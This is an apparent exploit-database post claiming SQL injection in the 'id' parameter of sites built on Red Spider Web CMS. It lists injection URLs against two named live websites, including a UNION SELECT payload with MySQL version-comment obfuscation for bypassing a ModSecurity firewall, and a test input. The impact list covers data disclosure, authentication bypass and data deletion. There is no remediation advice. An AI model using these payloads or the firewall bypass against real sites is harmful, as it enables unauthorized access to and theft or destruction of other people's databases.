********************************************************* # Exploit Title: SQL Injection – Red Spider Web CMS # Date: 2025-12-11 # Exploit Author: ITACHI - SELI # Category: Web Applications # Tested on: Windows 10 / Kali Linux CVE: Not Assigned ********************************************************* ##Summary : A SQL Injection vulnerability was discovered in multiple websites developed using the Red Spider Web CMS. The issue exists in the "id" parameter of pages like project.php, pic.php, and gallery.php, where user input is not properly sanitized. ********************************************************* ###Dom : https://www.jbshowrah.com/project.php?id=47'/*!50000UNION/**_**/*//*!50000SELECT/**_**/*/ database(),2,3--+ https://www.oarindia.org/gallery.php?id=1 ********************************************************* ####Waf : Mod_Security #####bypass waf : /*!50000UNION*/ ********************************************************* ###Vulnerability : The id parameter is directly passed into SQL queries without validation. Adding special characters (e.g., ') triggers SQL errors, confirming injection vulnerability. ********************************************************* Example test input : ?id=-1' ##Impact : Database information disclosure Possible authentication bypass Data manipulation or deletion Potential full database compromise